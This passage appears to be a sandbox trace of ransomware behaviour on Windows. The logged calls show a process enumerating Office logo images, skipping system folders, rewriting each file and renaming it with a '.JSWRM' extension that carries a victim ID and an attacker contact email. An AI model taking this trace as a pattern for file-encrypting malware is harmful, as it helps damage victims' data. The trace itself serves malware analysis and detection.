returned 1 [0134.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0134.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0134.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0134.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0134.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0134.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0134.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0134.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0134.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0134.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0134.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.236] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2263) returned 1 [0134.236] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.236] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8d0) returned 0x20c6c0 [0134.236] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8d0, lpOverlapped=0x0) returned 1 [0134.238] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.238] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8d0, lpOverlapped=0x0) returned 1 [0134.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0134.238] CloseHandle (hObject=0x238) returned 1 [0134.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0134.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0134.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0134.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0134.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0134.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0134.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0134.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0134.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.239] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0134.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0134.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0134.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0134.240] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8a15c5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8a15c5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9d9, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogo.contrast-black_scale-140.png", cAlternateFileName="WIE5F9~1.PNG")) returned 1 [0134.240] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-140.png", lpString2=".") returned 1 [0134.240] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-140.png", lpString2="..") returned 1 [0134.240] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-140.png", lpString2="...") returned 1 [0134.240] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-140.png", lpString2="windows") returned 1 [0134.240] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-140.png", lpString2="recovery") returned 1 [0134.240] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-140.png", lpString2="perflogs") returned 1 [0134.240] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0134.240] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0134.240] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-140.png", lpString2="system volume information") returned 1 [0134.240] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-140.png", lpString2="msocache") returned 1 [0134.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0134.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0134.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0134.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0134.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0134.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22ce70, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0134.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0134.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0134.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0134.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f1b0 [0134.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.242] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2521) returned 1 [0134.242] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9d0) returned 0x20c6c0 [0134.242] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9d0, lpOverlapped=0x0) returned 1 [0134.280] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.280] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9d0, lpOverlapped=0x0) returned 1 [0134.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0134.281] CloseHandle (hObject=0x238) returned 1 [0134.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0134.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0134.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0134.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0134.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0134.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0134.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0134.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0134.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.281] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0134.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0134.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f1b0 | out: hHeap=0x1e0000) returned 1 [0134.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0134.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.283] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8a15c5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8a15c5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a8a15c5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd4e, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogo.contrast-black_scale-180.png", cAlternateFileName="WI28C8~1.PNG")) returned 1 [0134.283] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-180.png", lpString2=".") returned 1 [0134.283] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-180.png", lpString2="..") returned 1 [0134.283] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-180.png", lpString2="...") returned 1 [0134.283] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-180.png", lpString2="windows") returned 1 [0134.283] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-180.png", lpString2="recovery") returned 1 [0134.283] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-180.png", lpString2="perflogs") returned 1 [0134.283] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0134.283] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0134.283] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-180.png", lpString2="system volume information") returned 1 [0134.283] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-180.png", lpString2="msocache") returned 1 [0134.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0134.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0134.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0134.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0134.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0134.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0134.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22d298, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0134.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0134.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0134.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0134.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0134.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.285] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3406) returned 1 [0134.285] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd40) returned 0x24e1d8 [0134.285] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd40, lpOverlapped=0x0) returned 1 [0134.291] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.291] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd40, lpOverlapped=0x0) returned 1 [0134.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0134.292] CloseHandle (hObject=0x238) returned 1 [0134.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0134.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0134.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0134.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0134.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0134.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0134.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0134.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0134.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.292] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0134.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0134.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0134.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0134.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.293] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8a15c5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8a15c5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x806, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogo.contrast-black_scale-80.png", cAlternateFileName="WI813E~1.PNG")) returned 1 [0134.293] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-80.png", lpString2=".") returned 1 [0134.293] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-80.png", lpString2="..") returned 1 [0134.293] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-80.png", lpString2="...") returned 1 [0134.293] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-80.png", lpString2="windows") returned 1 [0134.293] lstrcmpiW 